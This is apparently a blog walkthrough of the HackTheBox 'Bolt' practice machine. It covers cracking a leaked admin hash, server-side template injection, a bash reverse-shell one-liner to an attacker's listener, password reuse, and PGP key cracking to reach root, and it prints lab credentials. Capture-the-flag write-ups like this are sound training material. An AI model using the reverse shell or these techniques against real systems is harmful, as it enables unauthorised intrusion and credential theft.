In this post, I would like to share a walkthrough of the Bolt Machine from HackTheBox
This room has been considered difficulty rated as a medium machine on HackThebox
What will you gain from the Bolt machine?
For the user flag, you will execute some SSTI attack on the website to obtain a reverse shell on the machine
As for the root flag, you need to play with Chrome password reuse that has been found on the .config directory
Information Gathering
Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
Let’s try to access the website interface
On the website, there are two functions login and pages.
Firstly, let’s see the login page.
We don’t have any credentials to login but let’s try to login with normal credentials such as admin:admin
Sadly, we got error 403 ACCESS DENIED!
As a result, we need to find any credentials that we can login into the Dashboard.
On the Pages Function, there have a few links that we can look into, but Download Link caught my attention. Without further ado, let’s click the Download link
The Link has been re-direct to a page that allows us to download the file (image.tar) into our machine.
Let’s unzip the download file by using the command tar -xvf image.tar and we are presented with a lot of files
Let’s analyze all the folders and i notice that there’s a similar file in each folder.
It will take a long post if I reveal all files in the folder. So, I will just reveal those files that are important for us to obtain privileges
There’s a db.sqlite3 file where we can obtain the username and password for the Dashboard.
Gaining Privileges Access to bolt machine
We can access the db.sqlite3 by executing the sqlite3 tool
Honestly, i don’t have enough experience with the sqlite3 tool and as a result, we will need to read the help manual
From the manual, I notice that we can run the .tables command to check what tables have been saved on the db.sqlite3
We managed to obtain admin hashes by running select * from user;
Let’s save the hashes on our machine and crack the hashes by using john
However, we cannot crack the hash for some reason and we should troubleshoot the issues
After a while, I found the issues in which I have wrongly copy-paste the hashes into our machine
It should look as shown above.
Finally, we have successfully obtained the password for the admin. Let’s login the bolt.htb with the credentials such as
- username: admin
- password: deadbolt
Maintaining Privileges Access
Let’s roam the Dashboard to find any vulnerabilities or bugs inside here.
From the direct chat above, we have been informed that there’s another domain stored in the machine. Let’s enumerate the machine using gobuster
Wow! We successfully obtain two new subdomains which are mail and demo
The subdomain demo only shows a login page that will require credentials. Let’s create an account for the this
We are required to key in the invite code which we found earlier.
Finally, we can register an account using the invite code
Oh voila! We managed to access the Dashboard using the account that we created earlier.
On the other hand, we might be able to login the mail Roundcube using those credentials
There’s no email being stored over there while we access the mail.bolt.htb
We should be able to clarify the version of the RoundCube Webmail that we are using
Let’s roam around the Dashboard in case we found any useful vulnerabilities.
Attack verification on the website
Cross-Site Scripting
We should test any attack on the profile settings where for starters, we can use Cross-Site Scripting (XSS) to verify whether it works in the interface
An email requires us to click the link to confirm the profile change
## The step above will be repeated over and over whenever we make some changes to the profile ##
Sadly, nothing happens when we run an XSS attack on the profile.
Server Site Template Injection (SSTI) attack
As a result, we can try to exploit using the SSTI method
The step has been similar to previously
Oh wow, we managed to sight that SSTI is a thing on the system.
Let’s do some research on the SSTI Attack so that we can use it in the future
We found a command that we can use for the SSTI method inside the HackTricks website interface
There’s another SSTI attack that the tester will normally use to verify the SSTI attack method
We got the config shown above.
From the research output, let’s try some java SSTI commands to get “id”
Sadly, we failed to get “id” output from that command
Let’s try another SSTI command
YES! We managed to retrieve the output that we wanted so badly.
Let’s start our NC listener so that we can retrieve the connection back.
For us to obtain the reverse shell connection back to us, i change “id” into “/bin/bash -c “bash -i >& /dev/tcp/<ip>/<port>”‘
We got the reverse shell back to us
On the home directory, we got two users which are Clark and Eddie
There’s passbolt directory that seems out of place that has been stored on a Linux operating system to have.
We notice that there’s a file called passbolt.php which might contain any credentials.
We got the password that we can use while reading the passbolt.php file
At last, we managed to find out that its password used by Eddie
Let’s ssh into the machine to get a better access
We can obtain a user flag by executing cat “user.txt“
Escalate to Root Privileges Access on Bolt
Before we proceed with the further privileges, we need to access the MySQL database where you will find a table(secret) that has been encrypted message just like below:
-----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org
wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc
g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY
pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H
oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px
l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R
zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp
edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u
l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt
oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7
FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov
8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey
5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY
NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a
Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs
nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6
TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984
=P38i
-----END PGP MESSAGE-----We should save the encrypted message if required in the future.
If we look back on the earlier process, we managed to obtain shell using mail factor so let’s access /var/mail/ directory where there’s an Eddie file
On the Eddie file, we sighted an email coming from Clark that mention the extension to your browser.
Let’s access the directory above in case anything appears there.
There’s a log file that we can analyze further
The file contains a lot of things, but PGP Public Key Block have caught my attention the most
We can save the PGP using anything.key and later convert it to hash format by using gpg2john anything.key > anything.hash
After converting to hash from PGP format, the file will look such as above which it can be used to obtain a password for the chrome
I stumbled over an issue over here but if everything works well, you will be provided with the password such as merrychristmas
Once we obtain the password for the merrychristmas, we can decrypt the message that was encrypted previously.
For us to obtain the password from the encrypted message, we need to execute the following command
- gpg –batch –import anything.key
- gpg –pinetry-mode loopback –passphrase merrychristmas -d encrypted_message.asc
In the end, you will get the password (Z(2rmxsNW(Z?3=p/9s) to access Root Privileges.
We can read the root flag by running the “cat root.txt” command
-THE END-
Happy Learning Guys!
Extra Information on Bolt
We can go to /etc/shadow so that we can unlock and read the write-up
No responses yet